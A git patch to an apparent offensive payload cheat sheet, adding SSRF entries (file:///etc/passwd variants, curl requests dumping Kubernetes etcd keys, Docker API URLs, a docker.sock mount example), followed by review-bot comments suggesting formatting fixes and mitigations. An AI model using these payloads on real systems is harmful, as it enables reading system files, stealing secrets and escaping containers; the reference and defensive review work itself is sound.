From cfbe1a446924b5e44823a5efe0a7fe025ae35767 Mon Sep 17 00:00:00 2001 From: Swissky Date: Sun, 19 Aug 2018 16:32:26 +0200 Subject: [PATCH] SSRF Docker & Kubernetes --- SSRF injection/README.md | 28 ++++++++++++++++++++++++++++ XSS injection/README.md | 1 + 2 files changed, 29 insertions(+) diff --git a/SSRF injection/README.md b/SSRF injection/README.md index 5850d06..cbd1f2d 100644 --- a/SSRF injection/README.md +++ b/SSRF injection/README.md @@ -153,6 +153,13 @@ List: ## SSRF via URL Scheme +File Wrapper + +```powershell +file:///etc/passwd +file://\/\/etc/passwd +``` + Dict Wrapper The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol: @@ -396,6 +403,27 @@ http://100.100.100.200/latest/meta-data/instance-id http://100.100.100.200/latest/meta-data/image-id ``` +### SSRF URL for Kubernetes ETCD + +Can contain API keys and internal ip and ports + +```powershell +curl -L http://127.0.0.1:2379/version +curl http://127.0.0.1:2379/v2/keys/?recursive=true +``` + +### SSRF URL for Docker + +```powershell +http://127.0.0.1:2375/v1.24/containers/json + +Simple example +docker run -ti -v /var/run/docker.sock:/var/run/docker.sock bash +bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json +bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json +``` + + ## Thanks to * [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF) diff --git a/XSS injection/README.md b/XSS injection/README.md index 7071b08..348dab8 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md @@ -682,6 +682,7 @@ Bypass using weird encoding or native interpretation to hide the payload (alert( Exotic payloads ```javascript +
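Review bot: in the first SSRF README hunk (the "File Wrapper" entry under "SSRF via URL Scheme") the fence is tagged `powershell` although it holds two `file://` URLs, not PowerShell; tag it as plain text or `text` so it renders honestly, and add one line saying why the second spelling (`file://\/\/etc/passwd`) is listed, since as written a reader cannot tell whether it is a typo or a deliberate variant. From a defensive angle the entry would be more useful with a mitigation sentence next to it, for example: "Mitigation: allowlist the URL schemes the fetcher may use (typically only http and https) rather than blocklisting file://", which matches the structure the other wrapper entries in this file follow.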
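Review bot: in the second SSRF README hunk (the new "SSRF URL for Kubernetes ETCD" and "SSRF URL for Docker" sections) prose and commands are mixed inside one code fence, and both fences are tagged `powershell` while the contents are URLs and `curl`/`docker` shell commands; split the Docker block into a URL line, the sentence "Simple example", and a `bash`-tagged block for the three commands, and fix "internal ip and ports" to "internal IP addresses and ports". The `docker run -ti -v /var/run/docker.sock:/var/run/docker.sock bash` example also does not belong under an SSRF heading: it mounts the local Unix socket into a container, which is a container-escape scenario, not a request forged through a vulnerable web application, so either move it to a note or label it as the local equivalent of the `http://127.0.0.1:2375` case. Both sections would benefit from one line on exposure conditions so defenders know what to check: port 2375 is Docker's unauthenticated plain-TCP API (the TLS variant is 2376) and is not enabled by default, and 2379 is the etcd client port, which is only readable without credentials when etcd runs without client authentication; recommending TLS client auth and binding these services to localhost or a private interface would be the natural mitigation line. Finally, the hunk adds two blank lines before `## Thanks to`; one is enough.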
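Review bot: in the XSS README hunk (the "Exotic payloads" fence) the single added line appears empty in this rendering, and the diffstat reports it as that file's only insertion, so the payload itself cannot be reviewed here; if the line really is blank it should be dropped, and if it carries a payload it should be accompanied by a short comment stating which parser or encoding quirk it exercises, as the section intro ("Bypass using weird encoding or native interpretation to hide the payload") promises for the entries that follow it.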